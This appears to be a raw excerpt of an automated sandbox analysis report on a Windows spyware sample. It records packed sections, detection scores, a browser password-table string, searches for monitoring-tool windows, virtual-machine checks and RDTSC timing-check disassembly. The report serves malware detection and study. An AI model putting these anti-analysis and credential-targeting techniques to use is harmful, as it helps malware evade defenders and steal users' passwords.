                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B50BED0_2_00B50BED
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B3CBEA0_2_00B3CBEA
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B5BBEF0_2_00B5BBEF
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B7BBEA0_2_00B7BBEA
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B92BD00_2_00B92BD0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B93BC30_2_00B93BC3
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA6B390_2_00BA6B39
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B34B270_2_00B34B27
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B72B110_2_00B72B11
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AB8B1B0_2_00AB8B1B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B66B040_2_00B66B04
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ADFB100_2_00ADFB10
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA7B790_2_00BA7B79
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B42B730_2_00B42B73
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA9B740_2_00BA9B74
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B0DB6A0_2_00B0DB6A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B3FB690_2_00B3FB69
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B43B6B0_2_00B43B6B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B4FB540_2_00B4FB54
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B87B590_2_00B87B59
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AAAB400_2_00AAAB40
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B41B590_2_00B41B59
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B56B5A0_2_00B56B5A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B40CB50_2_00B40CB5
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B6ECB40_2_00B6ECB4
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AB4CA00_2_00AB4CA0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B3BCB80_2_00B3BCB8
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B9FCAB0_2_00B9FCAB
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B33CA00_2_00B33CA0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B2BC960_2_00B2BC96
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B88C9D0_2_00B88C9D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B84C910_2_00B84C91
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B28C820_2_00B28C82
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B6BC8C0_2_00B6BC8C
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B1BC8A0_2_00B1BC8A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AD1CF00_2_00AD1CF0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B8DCE60_2_00B8DCE6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B5DCC70_2_00B5DCC7
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00C5BCBE0_2_00C5BCBE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B24C320_2_00B24C32
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B29C310_2_00B29C31
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B67C3E0_2_00B67C3E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B1FC380_2_00B1FC38
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B71C240_2_00B71C24
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B27C260_2_00B27C26
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B12C120_2_00B12C12
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B0CC1F0_2_00B0CC1F
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B15C060_2_00B15C06
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B3AC080_2_00B3AC08
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B04C0B0_2_00B04C0B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AD3C100_2_00AD3C10
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B05C500_2_00B05C50
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B2AC570_2_00B2AC57
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA5C5F0_2_00BA5C5F
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B26C5D0_2_00B26C5D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AD7DA90_2_00AD7DA9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B4CDB10_2_00B4CDB1
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B91DB70_2_00B91DB7
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B99D970_2_00B99D97
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B10D850_2_00B10D85
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B36DF90_2_00B36DF9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: String function: 00AB4C90 appears 77 times
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: String function: 00AA7F60 appears 40 times
                Source: 3LUyRfIoKs.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 3LUyRfIoKs.exe Static PE information: Section: ZLIB complexity 0.9996361825980392
                Source: 3LUyRfIoKs.exe Static PE information: Section: keznjtty ZLIB complexity 0.9945888044063365
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AD2070 CoCreateInstance, 0_2_00AD2070
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2195058043.0000000005A11000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2196251811.00000000059F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 3LUyRfIoKs.exe Virustotal: Detection: 59%
                Source: 3LUyRfIoKs.exe ReversingLabs: Detection: 65%
                Source: 3LUyRfIoKs.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe File read: C:\Users\user\Desktop\3LUyRfIoKs.exe
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: webio.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Section loaded: version.dll
                Source: 3LUyRfIoKs.exe Static file information: File size 1836544 > 1048576
                Source: 3LUyRfIoKs.exe Static PE information: Raw size of keznjtty is bigger than: 0x100000 < 0x196600

                Data Obfuscation

                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Unpacked PE file: 0.2.3LUyRfIoKs.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;keznjtty:EW;slutevoy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;keznjtty:EW;slutevoy:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: 3LUyRfIoKs.exe Static PE information: real checksum: 0x1c1b56 should be: 0x1ca564
                Source: 3LUyRfIoKs.exe Static PE information: section name:
                Source: 3LUyRfIoKs.exe Static PE information: section name: .idata
                Source: 3LUyRfIoKs.exe Static PE information: section name:
                Source: 3LUyRfIoKs.exe Static PE information: section name: keznjtty
                Source: 3LUyRfIoKs.exe Static PE information: section name: slutevoy
                Source: 3LUyRfIoKs.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_3_01404051 push ebp; ret 0_3_01404052
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_3_01406818 push eax; retf 0_3_0140681A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_3_01404830 push esp; iretd 0_3_01404832
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AF9703 push 1DE84D8Eh; mov dword ptr [esp], eax 0_2_00AF9708
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AF9703 push esi; mov dword ptr [esp], 46DFD68Bh 0_2_00AF970D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00CC10C2 push 43FC49CAh; mov dword ptr [esp], ebx 0_2_00CC1100
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00D810C3 push ebx; mov dword ptr [esp], 56034072h 0_2_00D80FF0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00D810C3 push 5688568Fh; mov dword ptr [esp], eax 0_2_00D810DC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AFD0E3 push 240590BFh; mov dword ptr [esp], ecx 0_2_00AFD11A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00BC40F2 push ebx; mov dword ptr [esp], eax 0_2_00BC410F
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00BC40F2 push 1B1EFC95h; mov dword ptr [esp], ebx 0_2_00BC415B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AFE0F9 push 4A8E9960h; mov dword ptr [esp], esi 0_2_00AFE101
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AF80CB push 6B249466h; mov dword ptr [esp], eax 0_2_00AF80D0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AFC0D6 push edx; mov dword ptr [esp], ebp 0_2_00AFC0DE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AFF024 push esi; mov dword ptr [esp], 456EB857h 0_2_00AFF02B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AFC01C push edi; mov dword ptr [esp], ecx 0_2_00AFC025
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00AD7069 push es; retf 0_2_00AD7074
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00B77058 push 3F49ED56h; mov dword ptr [esp], ebx 0_2_00B775A1
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00B77058 push 53714E41h; mov dword ptr [esp], esp 0_2_00B775B7
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00B77058 push ecx; mov dword ptr [esp], edi 0_2_00B775D0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00B77058 push edi; mov dword ptr [esp], 61F4C200h 0_2_00B77676
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Code function: 0_2_00B77058 push 17ADC507h; mov dword ptr [esp], ebx 0_2_00B776B8
                Source: 3LUyRfIoKs.exe Static PE information: section name: entropy: 7.987306923457494
                Source: 3LUyRfIoKs.exe Static PE information: section name: keznjtty entropy: 7.953745081857698

                Boot Survival

                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe, WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe, System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe, File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exe, File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CAEA90 second address: CAEA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CACB4C second address: CACB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB19B0 second address: CB1A38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F2830CEE570h 0x00000010 jmp 00007F2830CEE56Ah 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F2830CEE568h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov ebx, esi 0x00000032 push 00000000h 0x00000034 jmp 00007F2830CEE571h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007F2830CEE568h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 sub ebx, 33316136h 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push esi 0x00000060 pop esi 0x00000061 pop eax 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB1B63 second address: CB1B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB1C13 second address: CB1C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2830CEE566h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB1C28 second address: CB1C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB3E4E second address: CB3E58 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2830CEE56Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CB6E12 second address: CB6E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBDFA7 second address: CBDFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBDFAB second address: CBDFCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Dh 0x00000007 jmp 00007F2830CF2D30h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBDFCC second address: CBDFD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBDFD5 second address: CBDFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CF2D2Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBDFEF second address: CBDFF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE13D second address: CBE147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2830CF2D26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE147 second address: CBE16C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F2830CEE57Fh 0x00000010 jmp 00007F2830CEE573h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE16C second address: CBE170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE170 second address: CBE191 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007F2830CEE566h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F2830CEE571h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE2C8 second address: CBE2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CBE2D2 second address: CBE2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CEE579h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CC7769 second address: CC776F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CC776F second address: CC778B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2830CEE572h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CC7D11 second address: CC7D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CF2D34h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CC7E8D second address: CC7E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CC8177 second address: CC817D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCCC83 second address: CCCC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCCC8B second address: CCCC9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F2830CF2D26h 0x00000009 jns 00007F2830CF2D26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCCC9C second address: CCCCA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCCCA2 second address: CCCCAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCCCAE second address: CCCCD9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2830CEE579h 0x0000000f jl 00007F2830CEE56Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA12DE second address: CA12E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA12E2 second address: CA1313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F2830CEE571h 0x0000000e lea eax, dword ptr [ebp+1247C03Fh] 0x00000014 mov dword ptr [ebp+122D20F4h], edx 0x0000001a push eax 0x0000001b pushad 0x0000001c pushad 0x0000001d jns 00007F2830CEE566h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA13DE second address: CA13E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA14B4 second address: CA14BE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA17DE second address: AF8C5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2830CF2D28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call 00007F2830CF2D39h 0x00000010 mov dl, ah 0x00000012 pop ecx 0x00000013 or edx, dword ptr [ebp+122D3780h] 0x00000019 push dword ptr [ebp+122D0089h] 0x0000001f cmc 0x00000020 call dword ptr [ebp+122D2263h] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D2226h], edi 0x0000002d xor eax, eax 0x0000002f cld 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 pushad 0x00000035 mov cl, 35h 0x00000037 push ecx 0x00000038 mov di, 8E28h 0x0000003c pop edi 0x0000003d popad 0x0000003e mov dword ptr [ebp+122D3B18h], eax 0x00000044 pushad 0x00000045 jmp 00007F2830CF2D2Ch 0x0000004a pushad 0x0000004b push ecx 0x0000004c pop esi 0x0000004d mov dword ptr [ebp+122D2226h], esi 0x00000053 popad 0x00000054 popad 0x00000055 mov esi, 0000003Ch 0x0000005a mov dword ptr [ebp+122D1DBDh], ecx 0x00000060 add dword ptr [ebp+122D32A6h], ecx 